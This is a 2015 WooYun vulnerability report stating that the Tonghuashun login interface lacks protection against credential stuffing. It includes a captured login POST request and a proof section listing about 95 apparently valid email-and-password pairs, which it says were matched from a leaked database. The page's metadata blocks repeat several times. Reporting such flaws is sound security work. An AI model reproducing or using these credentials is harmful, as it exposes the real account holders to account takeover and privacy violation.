同花顺某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113364

漏洞标题：同花顺某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞作者：路人甲

提交时间：2015-05-11 10:26

修复时间：2015-05-16 10:28

公开时间：2015-05-16 10:28

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库泄露用户隐私

详细说明：

求审核下5号的漏洞~~~
主站登陆登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号。登录接口抓包如下：

POST /login HTTP/1.1
Host: pass.10jqka.com.cn
Content-Length: 60
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.10jqka.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.10jqka.com.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: 
RA-Ver: 2.10.3
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close
uname=569225845@qq%2ecom&passwd=dslak364075&act=login_submit

漏洞证明：

经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号.

xqygym@126.com	xuqingyu
ruanwei@yeah.net	michael202
sch27@126.com	2968506sch
upuphappy@126.com	123zhang123
ljze@qq.com	591771abcd
tcchengs@126.com	tcchengs
575579791@qq.com	19861202
harthuang@gmail.com	198211
jianghexi@yahoo.com.cn	16881688
xue.mail66@163.com	hobbygood
wutiantai@126.com	32201937
dazi1988@qq.com	da811001
zrjufo@126.com	981913214270
parcolxr@163.com	lxr4renxian7
zms1225@163.com	zh0uzh0u
crazebluesky@163.com	bluesky
jcz-1987@126.com	2080346680
nhuliuwei@163.com	liuwei66
cbh-1@163.com	147369991
yilei.zhang2006@gmail.com	111111
alex8090@163.com	35986137
aquila@21cn.com	smart1010
yjsochris@163.com	697542
21west@163.com	zzzzzz
rain1a3@163.com	2144411le
qibing83@yahoo.com.cn	qibing83
marcopolo0000@126.com	zzz1210123
wakelion@21cn.com	terminal
450821972@qq.com	19831220
163disk3@163.com	81030400
changchangccc@126.com	wangdong
20296223@sina.com	123456
yuantianyu_14@sina.com	1420191988
493829041@qq.com	kit646497
qq99849914@163.com	51975197
yinjianatnj@163.com	weblogic
linkanying81@163.com	LKY811007
woshixianghuan@yahoo.com.cn	xh159753
tangjiamiao6@126.com	woshitjm
sun199810@hotmail.com	19741209
dongyi_66@163.com	54051298
30150676@qq.com	fei527520
272688239@qq.com	110119qq
wyxhbxby@126.com	wy2152378
37696367@qq.com	080200305
li_wei_888@163.com	czcfdlkj
ivysmonkey@163.com	aaaaaaaa
bbmhq@qq.com	miaosoft
llno12003@yahoo.com.cn	111111
arosebushpp@163.com	32788646
littlesong73@163.com	Swhy920520
garywu1983@hotmail.com	123456789
zhangzhang0103@163.com	shmily0103
kenyon111@126.com	lijuan0526
lxl880304@163.com	19870513
ixcfr@126.com	gaofeng218
xgmqc@163.com	iloveyou
sunch521@126.com	sunch521
wxc9871@163.com	98712105
blackwig@163.com	kissblack
315758189@qq.com	90269084
164363616@qq.com	aaa3522635
jiajianwei163@163.com	5808177024
yidingzhidao@163.com	19831105
guowei676@163.com	25894594
zdance@126.com	zhuangdong
sccdliubo@126.com	liubo777
lcltju@gmail.com	lcl9abq1
qi_840116@163.com	87422030
529885364@qq.com	73366227
404391922@qq.com	hsb123569
mqt052@163.com	jccg1000
jengjeng@163.com	790915
75866382@qq.com	845169se
278101213@qq.com	89215439
linjinen@163.com	linjinen
727955456@qq.com	nimamade
cfgzw8877@163.com	375884312
wolou@126.com	52013142002
liuran_aly@126.com	111213lr
qwas_wz_8044096@126.com	fumuhaizi
michaeldoer@hotmail.com	q1w2e3r4
malianxi@tom.com	abc123123
linadarling@163.com	bullshit
78167949@qq.com	adminkid
hermit2046@163.com	gq864200
hule1984@163.com	zj840728
ssigyu@yahoo.com.cn	sscyu777
569225845@qq.com	dslak364075
1979xiuzhuo@163.com	86532956
ad51241131@163.com	ad51241133
graduatechai@163.com	chai12345
eachtour@msn.com	19741214
51519718@qq.com	iamcesar
qezhu@sina.com	tan1978
313717623@qq.com	86874724
robotor@126.com	0123456789

修复方案：

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-05-16 10:28

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113364

漏洞标题：同花顺某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：同花顺

漏洞作者：路人甲

提交时间：2015-05-11 10:26

修复时间：2015-05-16 10:28

公开时间：2015-05-16 10:28

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113364

漏洞标题：同花顺某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：同花顺

漏洞作者： 路人甲

提交时间：2015-05-11 10:26

修复时间：2015-05-16 10:28

公开时间：2015-05-16 10:28

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113364"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云